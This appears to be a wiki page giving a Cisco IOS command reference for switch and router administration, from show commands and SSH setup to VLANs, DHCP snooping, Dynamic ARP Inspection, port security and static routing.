		<summary type="html">&lt;p&gt;50.220.241.211: /* Administrative Distance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
